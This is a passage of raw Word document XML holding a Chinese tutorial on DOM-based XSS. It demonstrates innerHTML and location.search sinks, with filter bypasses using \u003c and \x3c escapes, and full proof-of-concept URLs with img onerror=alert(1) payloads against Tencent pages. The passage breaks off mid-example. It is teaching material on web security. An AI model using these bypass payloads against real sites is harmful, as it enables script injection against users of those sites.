      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上面看起来废话好多，但是还是很重要的，这对于后面实例的讲解很重要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10976" w:rsidRPr="009C207F" w:rsidRDefault="005440EB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</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们来看看一个具体的实例，地址如下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5440EB" w:rsidRPr="009C207F" w:rsidTr="005440EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="005440EB" w:rsidRPr="009C207F" w:rsidRDefault="005440EB" w:rsidP="009C207F">
            <w:pPr>
              <w:pStyle w:val="detail1"/>
              <w:spacing w:after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207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://datalib.ent.qq.com/cgi-bin/search?libid=1&amp;keyvalue=aaaaaaa&amp;attr=133&amp;stype=2&amp;tname=star_second.shtml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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和前面反射型的一样，我们先看看输出。</w:t>
      </w:r>
    </w:p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239BF493" wp14:editId="3102689F">
            <wp:extent cx="5715000" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="32" name="图片 32" descr="36.jpg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6.jpg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76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32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相关代码，我也贴出来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5440EB" w:rsidRPr="009C207F" w:rsidTr="005440EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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&lt;strongid="titleshow"&gt;按职业1检索：aaaaaaa&lt;/strong&gt;&lt;/div&gt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&gt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if("aaaaaaa"=="")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document.getElementById("titleshow").innerHTML="按地区检索：全部明星"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if("职业1"=="职业1")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document.getElementById("titleshow").innerHTML="按职业检索：aaaaaaa"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if("职业1"=="职业2")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document.getElementById("titleshow").innerHTML="按职业检索：aaaaaaa"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if("职业1"=="职业3")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document.getElementById("titleshow").innerHTML="按职业检索：aaaaaaa";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005440EB" w:rsidRPr="009C207F" w:rsidRDefault="005440EB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/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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6.一共有6处，有一处图上没显示,但是也没用处，这里不列出来了，看上面代码中的5处。我们已经知道，&lt;,&gt;,"都被过滤了，用前面提到的某些技巧，似乎也无法直接XSS。那么该怎么办呢？</w:t>
      </w:r>
    </w:p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7.在看到本教程的1，2，3部分后，聪明的你们不知道会不会想到些什么呢？</w:t>
      </w:r>
    </w:p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对的，那就是这里出现了innerHTML="[输出]"的情况。</w:t>
      </w:r>
    </w:p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可以看到，上面代码中，实际上只有一句是运行了的。我们重点看它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762A" w:rsidRPr="009C207F" w:rsidTr="003E762A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003E762A" w:rsidRPr="009C207F" w:rsidRDefault="003E762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if("职业1"=="职业1")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003E762A" w:rsidRPr="009C207F" w:rsidRDefault="003E762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document.getElementById("titleshow").innerHTML="按职业检索：[输出]";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003E762A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8.这里[输出]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然过滤了&lt;,&gt;，但是并没有过滤\。这样一来，大家应该清楚，为什么上面要说到&lt;可以写为\u003c了吧。就是为了应付这种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10976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9.因此，我们可以构造缺陷点的代码如下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C4147" w:rsidRPr="009C207F" w:rsidTr="00CC4147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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if("职业1"=="职业1")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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document.getElementById("titleshow").innerHTML="按职业检索：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>\u003cimgsrc=1onerror=alert(1)\u003e";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003E762A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经过运行后，titleshow里的HTML就会变为&lt;imgsrc=1onerror=alert(1)&gt;，从而弹出1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10976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0.</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对应的，我们的利用代码，可以写为如下，其中空格，我</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>写为了</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\u0020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C4147" w:rsidRPr="009C207F" w:rsidTr="00CC4147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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datalib.ent.qq.com/cgi-bin/search?libid=1&amp;keyvalue=\u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e&amp;attr=133&amp;stype=2&amp;tname=star_second.shtml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C10976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1.</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看看对应的源代码，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>悲催的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>事情出现了，\u003c和\u003e竟然</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被腾讯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过滤了。。。</w:t>
      </w:r>
    </w:p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44745E99" wp14:editId="3F5DEE52">
            <wp:extent cx="5715000" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="图片 31" descr="37.jpg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7.jpg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47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3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C4147" w:rsidRPr="009C207F" w:rsidRDefault="00DA2931" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left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12.</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>别灰心，被过滤的原因，是因为@Jannock大牛在乌云报告过这个漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-可以让战场离得更远（</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>浅谈腾讯架构</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺陷）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left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其实我们还应该注意到上面图片中，过滤的实际上是\u003c和\u003e，但是并没有过滤\u0020，这说明，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯只是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>针对性的过滤，并没有过滤反斜线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10976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3.</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其实呢，在JS字符串里，&lt;不光可以写为\u003c，还可以写为\x3c，&gt;同样可以写为\x3e。我们</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>试试腾讯过滤</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了这个没有呢？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C4147" w:rsidRPr="009C207F" w:rsidTr="00CC4147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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datalib.ent.qq.com/cgi-bin/search?libid=1&amp;keyvalue=\x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e&amp;attr=133&amp;stype=2&amp;tname=star_second.shtml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C10976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4.</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对应源码，看来没过滤啊～～</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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18C985C" wp14:editId="59BDA95B">
            <wp:extent cx="5715000" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="图片 25" descr="38.jpg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8.jpg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47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34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C4147" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left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哎呀，这次总算弹出来了。见漏洞证明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147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5.</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后总结下。本例中是innerHTML的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147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实际上只要是与改变页面HTML内容相关的操作，都可能导致这种问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147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也是网上介绍domxss时，也经常会提到的东西，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00C1097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比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C4147" w:rsidRPr="009C207F" w:rsidTr="00CC4147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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document.getElementById("y").innerHTML="xxxxxxxxxx";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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document.write("xxxxxxxxxxxx");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left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还有一些网站，使用了第三方的JS库，譬如jQuery时，会有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C4147" w:rsidRPr="009C207F" w:rsidTr="00CC4147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147" w:rsidP="009C207F">
            <w:pPr>
              <w:pStyle w:val="a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207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>$("#y").html("xxxxxxx");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left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当然最后，还需要提到一些需要注意的地方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147" w:rsidRPr="009C207F" w:rsidTr="00CC4147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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lastRenderedPageBreak/>
              <w:t>aa.innerHTML="xxxxxxxxxxxx";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left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这种情况下。xxxxx只能使用&lt;imgsrc=1onerror=alert(1)&gt;这种方式来触发JS。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="left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而不能以&lt;script&gt;alert(1)&lt;/script&gt;来触发，因为这种压根不会执行&lt;script&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/script&gt;之间的内容。IE下，可以使用&lt;scriptdefer&gt;alert(1)&lt;/script&gt;。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84DCF" w:rsidRPr="009C207F" w:rsidRDefault="00D84DCF" w:rsidP="00D84DC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C10976" w:rsidRPr="009C207F" w:rsidRDefault="0019368A" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第九节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DomXss</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入门</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐式输出</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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19368A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周末</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上班，我也不工作。</w:t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周一啦，继续。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上一篇开始说DomXss了，我们说的是显式输出的情况，即我们可以在右键查看源代码的时候，看到我们所输出的内容。而有一些时候，输出操作我们是看不见的。它们通常发生在javascript代码中。譬如：varx=location.href;这句Javascript实际上进行了一个隐藏的输出操作，即将location.href的内容输出到了x变量中。一起来看看相关的例子吧～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前注：1-4是普通原理，没看明白的话，可以从5开始，结合实际例子看。</w:t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.本来是有另外一个例子的，不过不知道是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯已经</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>给修复了，还是之前测试的时候人品好，偶尔碰上了，总之现在用不上了。</w:t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2.这样一来，我们就只好用一个稍微复杂一点点的例子了。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3.在说实际例子前，我们来说一个前端开发人员非常习惯使用的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>段代码。下面大致写下伪代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352F0" w:rsidRPr="009C207F" w:rsidTr="00C352F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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functiongetParam(参数名){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ab/>
              <w:t>//获取地址栏参数,通常是a=1&amp;b=2&amp;c=3;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ab/>
              <w:t>varx=location.search;//或者是location.hash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 w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>//此时x="?a=1&amp;b=2&amp;c=3";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ab/>
              <w:t>//根据[参数名]取出参数名对应的值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ab/>
              <w:t>//例如参数名=a，则y=1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ab/>
              <w:t>//例如参数名=b,则y=2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ab/>
              <w:t>//至于这里怎么实现这个功能，可以用循环，可以用indexOf，可以用正则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 w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>vary=参数名对应的参数值;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 w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>//返回y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returny;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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它的作用呢？就是从地址栏的参数里取出内容。譬如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352F0" w:rsidRPr="009C207F" w:rsidTr="00C352F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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www.some.com/2.html?name=shouzi&amp;age=20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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在2.html，要显示name对应的值。对应的代码则非常可能下面这样写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52F0" w:rsidRPr="009C207F" w:rsidTr="00C352F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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&lt;divid="nick"&gt;加载中...&lt;/div&gt;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&gt;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vara=getParam("name");//获取地址栏里的name参数，即shouzi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document.getElementById("nick").innerHTML=a;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lastRenderedPageBreak/>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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4.上面是普通开发人员为了实现功能而写的代码，如果没有安全考虑，就会存在问题。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果上面的地址变为了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352F0" w:rsidRPr="009C207F" w:rsidTr="00A31B4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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www.some.com/2.html?name=&lt;imgsrc=1onerror=alert(1)&gt;&amp;age=20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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么变量a将会等于&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00C352F0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>imgsrc=1onerror=alert(1)&gt;</w:t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document.getEl</w:t>
      </w:r>
      <w:r w:rsidR="00C352F0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ementById(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C352F0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"nick").innerHTML=a;</w:t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即变成了</w:t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document.getElementById(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"nick").innerHTML="&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00C352F0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>imgsrc=1onerror=alert(1)&gt;";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样就变成了教程8中的情景，从而触发XSS。</w:t>
      </w:r>
      <w:r w:rsidR="00C352F0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5.接着我们看一个实际的例子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352F0" w:rsidRPr="009C207F" w:rsidTr="00C352F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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qt.qq.com/video/play_video.htm?sid=aaaaaa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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和原来的不同，我们在源代码里搜索不到东西的哦～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5C170124" wp14:editId="7993B04B">
            <wp:extent cx="5715000" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="35" name="图片 35" descr="40.jpg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.jpg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35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可能这里有人会有一个疑问了。那我们怎么知道有没有漏洞呢？别担心，方法是有的。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里以chrome为例，按F12，打开调试工具，见下图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31DF34DE" wp14:editId="5AFBF9A5">
            <wp:extent cx="5715000" cy="3562350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
